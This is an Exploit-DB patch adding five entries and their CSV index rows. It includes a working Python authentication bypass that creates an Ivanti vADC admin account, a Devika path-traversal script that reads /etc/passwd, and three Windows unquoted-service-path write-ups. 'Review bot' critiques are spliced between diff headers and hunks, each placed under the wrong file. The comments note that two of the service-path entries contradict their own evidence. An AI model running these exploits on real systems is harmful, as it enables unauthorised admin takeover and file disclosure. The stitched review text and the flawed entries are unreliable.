From 507bd26e3e79561b1219d0d77d6388463a8060ce Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Mon, 5 Aug 2024 00:16:24 +0000 Subject: [PATCH] DB: 2024-08-05 6 changes to exploits/shellcodes/ghdb Ivanti vADC 9.9 - Authentication Bypass Devika v1 - Path Traversal via 'snapshot_path' Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Oracle Database 12c Release 1 - Unquoted Service Path SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path --- exploits/multiple/webapps/52062.py | 48 ++++++++++++++++++++++++++++++ exploits/python/webapps/52066.py | 31 +++++++++++++++++++ exploits/windows/local/52063.txt | 31 +++++++++++++++++++ exploits/windows/local/52064.txt | 40 +++++++++++++++++++++++++ exploits/windows/local/52065.txt | 26 ++++++++++++++++ files_exploits.csv | 5 ++++ 6 files changed, 181 insertions(+) create mode 100755 exploits/multiple/webapps/52062.py create mode 100755 exploits/python/webapps/52066.py create mode 100644 exploits/windows/local/52063.txt create mode 100644 exploits/windows/local/52064.txt create mode 100644 exploits/windows/local/52065.txt diff --git a/exploits/multiple/webapps/52062.py b/exploits/multiple/webapps/52062.py new file mode 100755 index 000000000..6589f6b02 --- /dev/null +++ b/exploits/multiple/webapps/52062.py 
@@ -0,0 +1,48 @@
+# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass
+# Date: 2024-08-03
+# Exploit Author: ohnoisploited
+# Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller
+# Software Link: https://hubgw.docker.com/r/pulsesecure/vtm
+# Version: 9.9
+# Tested on: Linux
+# Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC
+# Fixed versions: 22.7R2+
+
+import requests
+
+# Set to target address
+admin_portal = 'https://192.168.88.130:9090'
+
+# User to create
+new_admin_name = 'newadmin'
+new_admin_password = 'newadmin1234'
+
+requests.packages.urllib3.disable_warnings()
+session = requests.Session()
+
+# Setting 'error' bypasses access control for wizard.fcgi.
+# wizard.fcgi can load any section in the web interface.
+params = { 'error': 1,
+ 'section': 'Access Management:LocalUsers' }
+
+# Create new user request
+# _form_submitted to bypass CSRF
+data = { '_form_submitted': 'form',
+ 'create_user': 'Create',
+ 'group': 'admin',
+ 'newusername': new_admin_name,
+ 'password1': new_admin_password,
+ 'password2': new_admin_password }
+
+# Post request
+r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)
+
+# View response
+content = r.content.decode('utf-8')
+print(content)
+
+if r.status_code == 200 and '2<' in content:
+ print("New user request sent")
+ print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
+else:
+ print("Unable to create new user")
\ No newline at end of file
diff --git a/exploits/python/webapps/52066.py b/exploits/python/webapps/52066.py
new file mode 100755
index 000000000..f95b0c6da
--- /dev/null
+++ b/exploits/python/webapps/52066.py
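Review bot: The success test on the final `if` — `r.status_code == 200 and '2<' in content` — is an unexplained magic substring, so any 200 page containing a digit followed by a tag is reported as "New user request sent" whether or not an account was created, while the only failure that is reliably detected is a redirect (302, since `allow_redirects=False`). A more defensible check confirms the account rather than the page shape: attempt a login with the new credentials, or at minimum use `new_admin_name in content` with a comment such as `# assumes the LocalUsers section echoes the user table in the response — confirm`. The script's side effect is a persistent admin account with hard-coded credentials; a header note that the account must be removed after an authorized test, and a `timeout=` plus `try/except requests.RequestException` around the `session.post`, would make this safer to run. The `# Fixed versions: 22.7R2+` line should also cite the vendor advisory or CVE so readers can map it to the patched release; the CSV row added in this commit leaves the CVE column empty.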
@@ -0,0 +1,31 @@
+# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
+# Google Dork: N/A
+# Date: 2024-06-29
+# Exploit Author: Alperen Ergel
+# Contact: @alpernae (IG/X)
+# Vendor Homepage: https://devikaai.co/
+# Software Link: https://github.com/stitionai/devika
+# Version: v1
+# Tested on: Windows 11 Home Edition
+# CVE: CVE-2024-40422
+
+#!/usr/bin/python
+
+import argparse
+import requests
+
+def exploit(target_url):
+ url = f'http://{target_url}/api/get-browser-snapshot'
+ params = {
+ 'snapshot_path': '../../../../etc/passwd'
+ }
+
+ response = requests.get(url, params=params)
+ print(response.text)
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
+ parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
+ args = parser.parse_args()
+
+ exploit(args.target)
\ No newline at end of file
diff --git a/exploits/windows/local/52063.txt b/exploits/windows/local/52063.txt
new file mode 100644
index 000000000..91ac1293e
--- /dev/null
+++ b/exploits/windows/local/52063.txt
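Review bot: The traversal payload in `exploit` is hard-coded to `'../../../../etc/passwd'`, a Linux-only target file, yet the header states `Tested on: Windows 11 Home Edition`, so the PoC as written cannot have produced the claimed read on its stated platform and gives a tester no way to pick a different file or traversal depth. Exposing the path as a `-p/--path` argument and printing `response.status_code` lets the reader distinguish a 404/500 from a successful read; `requests.get` also has no `timeout`, so an unresponsive host hangs the script indefinitely. Separately, `#!/usr/bin/python` sits at line 12 after the comment header, where it is not a shebang — move it to the first line or drop it.
```python
def exploit(target_url, traversal_path='../../../../etc/passwd'):
    """GET /api/get-browser-snapshot with an attacker-chosen snapshot_path."""
    url = f'http://{target_url}/api/get-browser-snapshot'
    response = requests.get(url, params={'snapshot_path': traversal_path}, timeout=10)
    print(response.status_code)
    print(response.text)

# … unchanged: argparse setup and -t/--target …
    parser.add_argument('-p', '--path', default='../../../../etc/passwd',
                        help='File to read, relative to the snapshot directory')
    args = parser.parse_args()
    exploit(args.target, args.path)
```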
@@ -0,0 +1,31 @@
+# Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path
+# Date: 2024-07-31
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# MiRROR-H: https://mirror-h.org/search/hacker/49626/
+# Vendor Homepage: https://www.oracle.com/
+# Software Link: https://www.oracle.com/
+# Version: 12c Release 1
+# Tested on: Windows 10 Pro x64
+
+C:\>sc qc "OracleDBConsoleorcl"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: OracleDBConsoleorcl
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME :
+C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : OracleDBConsoleorcl
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>systeminfo
+
+OS Name: Microsoft Windows 10 Pro
+OS Version: 10.0.19045 N/A Build 19045
+OS Manufacturer: Microsoft Corporation
\ No newline at end of file
diff --git a/exploits/windows/local/52064.txt b/exploits/windows/local/52064.txt
new file mode 100644
index 000000000..d6b05d55d
--- /dev/null
+++ b/exploits/windows/local/52064.txt
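Review bot: The evidence does not support an unquoted-service-path weakness: `BINARY_PATH_NAME : C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe` contains no spaces, and Windows only probes for an alternate executable (`C:\Program.exe` and so on) when a space splits an unquoted path, so there is nothing in this path for a low-privileged user to hijack. The path also sits under an `11.2.0` Oracle home, which is 11g Release 2 rather than the 12c Release 1 in the title, and the CSV hunk in this commit already lists 48418 for the same `OracleDBConsoleorcl` service on 11g R2. If the entry is kept it needs `sc qc` output showing a space-containing unquoted path plus `icacls` output proving that a low-privileged user can write to one of the prefix directories, which is the actual precondition for privilege escalation; otherwise it should be withdrawn.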
@@ -0,0 +1,40 @@
+# Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path
+# Date: 2024-07-31
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# MiRROR-H: https://mirror-h.org/search/hacker/49626/
+# Vendor Homepage: https://www.kiwisyslog.com/
+# Software Link: https://www.kiwisyslog.com/downloads
+# Version: Software Version 9.6.7.1
+# Tested on: Windows 10 Pro x64
+
+1. Description:
+
+SolarWinds Kiwi Syslog Server 9.6.7.1 is an affordable software to manage
+syslog messages, SNMP traps, and Windows event logs
+
+
+2. Proof
+
+C:\>sc qc "Kiwi Syslog Server"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Kiwi Syslog Server
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files
+(x86)\Syslogd\Syslogd_Service.exe"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Kiwi Syslog Server
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+C:\>systeminfo
+
+OS Name: Microsoft Windows 10 Pro
+OS Version: 10.0.19045 N/A Build 19045
+OS Manufacturer: Microsoft Corporation
\ No newline at end of file
diff --git a/exploits/windows/local/52065.txt b/exploits/windows/local/52065.txt
new file mode 100644
index 000000000..2df4a3052
--- /dev/null
+++ b/exploits/windows/local/52065.txt
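Review bot: The `sc qc` output under "2. Proof" contradicts the title: `BINARY_PATH_NAME : "C:\Program Files (x86)\Syslogd\Syslogd_Service.exe"` is quoted, and quoting is precisely the fix for an unquoted service path, not an instance of one. Windows performs the `C:\Program.exe` / `C:\Program Files.exe` search only when the image path is unquoted, so the service as shown is not exploitable by this technique even though it runs as `LocalSystem`. A valid submission needs output showing the path without quotes together with an `icacls` listing that demonstrates write access for a low-privileged user on a prefix directory; without that, this entry should be withdrawn rather than indexed next to 40393 and 47599, which describe older versions of the same service.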
@@ -0,0 +1,26 @@
+#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path
+#Exploit Author : SamAlucard
+#Exploit Date: 2024-07-31
+#Vendor : Genexus
+#Version : Genexus Protection Server 9.7.2.10
+#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
+#Vendor Homepage : https://www.genexus.com/es/
+#Tested on OS: Windows 10 Pro
+
+#Analyze PoC :
+==============
+
+C:\>sc qc protsrvservice
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: protsrvservice
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : ProtSrvService
+ DEPENDENCIAS : RPCSS
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5c9bb5076..1732e9626 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
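Review bot: The `sc qc` output does show an unquoted, space-containing image path running as `LocalSystem` (`NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe`), which matches the title, but the PoC omits the precondition that turns this into a privilege escalation: a low-privileged user must be able to create `C:\Program.exe` or `C:\Program Files.exe` in a prefix directory, which default Windows ACLs deny. Adding `icacls "C:\"` and `icacls "C:\Program Files (x86)"` output (or a `whoami /groups` plus the writable-directory check) would let readers judge whether this is an exploitable LPE or only a hardening finding. `CommonFiles` with no space looks like a transcription of `Common Files` — worth confirming against the real service config, since that would add `C:\Program Files (x86)\Common.exe` as a third probe path. Minor: the title repeats `Unquoted Service Path Service Path`, and the entry only bumps the version of the existing 49007 for the same service.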
@@ -11970,6 +11970,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24792,exploits/multiple/webapps/24792.txt,"IPCop 1.4.1 - Web Administration Interface Proxy Log HTML Injection",2004-11-30,"Paul Kurczaba",webapps,multiple,,2004-11-30,2013-03-15,1,CVE-2004-1210;OSVDB-12243,,,,,https://www.securityfocus.com/bid/11779/info
 49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",2021-01-06,MoeAlBarbari,webapps,multiple,,2021-01-06,2021-01-06,0,CVE-2021-3018,,,,,
 50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,multiple,,2021-11-03,2021-11-03,0,,,,,,
+52062,exploits/multiple/webapps/52062.py,"Ivanti vADC 9.9 - Authentication Bypass",2024-08-04,ohnoisploited,webapps,multiple,,2024-08-04,2024-08-04,0,,,,,,
 44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,,2018-05-15,2018-05-15,0,CVE-2018-5430,,,,,https://rhinosecuritylabs.com/application-security/authenticated-file-read-vulnerability-in-jasperreports/
 36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",webapps,multiple,,2015-04-13,2015-04-13,0,OSVDB-120064,,,,,
 35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117568;OSVDB-117567;CVE-2015-1478;CVE-2015-1477,,,,,
@@ -34968,6 +34969,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51636,exploits/python/webapps/51636.txt,"copyparty 1.8.2 - Directory Traversal",2023-07-28,"Vartamtezidis Theodoros",webapps,python,,2023-07-28,2023-07-28,1,,,,,,
 51635,exploits/python/webapps/51635.txt,"copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)",2023-07-28,"Vartamtezidis Theodoros",webapps,python,,2023-07-28,2023-07-28,1,CVE-2023-38501,,,,,
 51030,exploits/python/webapps/51030.txt,"CVAT 2.0 - Server Side Request Forgery",2022-11-11,"Emir Polat",webapps,python,,2022-11-11,2022-11-18,0,CVE-2022-31188,,,,,
+52066,exploits/python/webapps/52066.py,"Devika v1 - Path Traversal via 'snapshot_path'",2024-08-04,"Alperen Ergel",webapps,python,,2024-08-04,2024-08-04,0,CVE-2024-40422,,,,,
 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/
 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
@@ -40417,6 +40419,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows,,2017-05-08,2017-05-09,1,CVE-2017-6953,,,http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-05-08-at-152336.png,http://www.exploit-db.comSmartDiag_en.msi,
 51641,exploits/windows/local/51641.py,"General Device Manager 2.5.2.2 - Buffer Overflow (SEH)",2023-07-31,"Ahmet Ümit BAYRAM",local,windows,,2023-07-31,2023-07-31,0,,,,,,
 49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,,
+52065,exploits/windows/local/52065.txt,"Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path",2024-08-04,SamAlucard,local,windows,,2024-08-04,2024-08-04,0,,,,,,
 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,
 49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,
 49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,
@@ -41422,6 +41425,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16169,exploits/windows/local/16169.py,"Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow",2011-02-15,mr_me,local,windows,,2011-02-15,2011-03-04,1,,,,http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-03-04-at-14953-pm.png,,
 21044,exploits/windows/local/21044.c,"Oracle 8/9i - DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",local,windows,,2001-08-02,2012-09-03,1,CVE-2001-0941;OSVDB-9432,,,,,https://www.securityfocus.com/bid/3138/info
 48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,,2020-05-05,2020-05-05,0,,,,,,
+52063,exploits/windows/local/52063.txt,"Oracle Database 12c Release 1 - Unquoted Service Path",2024-08-04,"Milad karimi",local,windows,,2024-08-04,2024-08-04,0,,,,,,
 933,exploits/windows/local/933.sql,"Oracle Database PL/SQL Statement - Multiple SQL Injections s",2005-04-13,"Esteban Fayo",local,windows,,2005-04-12,,1,,,,,,
 932,exploits/windows/local/932.sql,"Oracle Database Server 10.1.0.2 - Local Buffer Overflow",2005-04-13,"Esteban Fayo",local,windows,,2005-04-12,,1,OSVDB-9866,,,,,
 1455,exploits/windows/local/1455.txt,"Oracle Database Server 9i/10g - 'XML' Local Buffer Overflow",2006-01-26,Argeniss,local,windows,,2006-01-25,,1,OSVDB-22572;CVE-2006-0287,,,,,http://www.argeniss.com/research/ARGENISS-ADV-010601.txt
@@ -41735,6 +41739,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",2021-10-14,"Mert Daş",local,windows,,2021-10-14,2021-10-14,0,,,,,,
 47599,exploits/windows/local/47599.txt,"SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path",2019-11-08,"Carlos A Garcia R",local,windows,,2019-11-08,2019-11-08,0,,,,,,
 40393,exploits/windows/local/40393.txt,"SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",local,windows,,2016-09-19,2016-09-19,0,,,,,,
+52064,exploits/windows/local/52064.txt,"SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path",2024-08-04,"Milad karimi",local,windows,,2024-08-04,2024-08-04,0,,,,,,
 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,,2020-05-11,2020-05-12,0,CVE-2020-12608,,,,,
 11219,exploits/windows/local/11219.pl,"SOMPL Player 1.0 - Local Buffer Overflow",2010-01-22,Rick2600,local,windows,,2010-01-21,,1,OSVDB-64368,,,,http://www.exploit-db.comsompl1_0.rar,
 48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,,2020-07-17,2020-07-17,0,,,,,,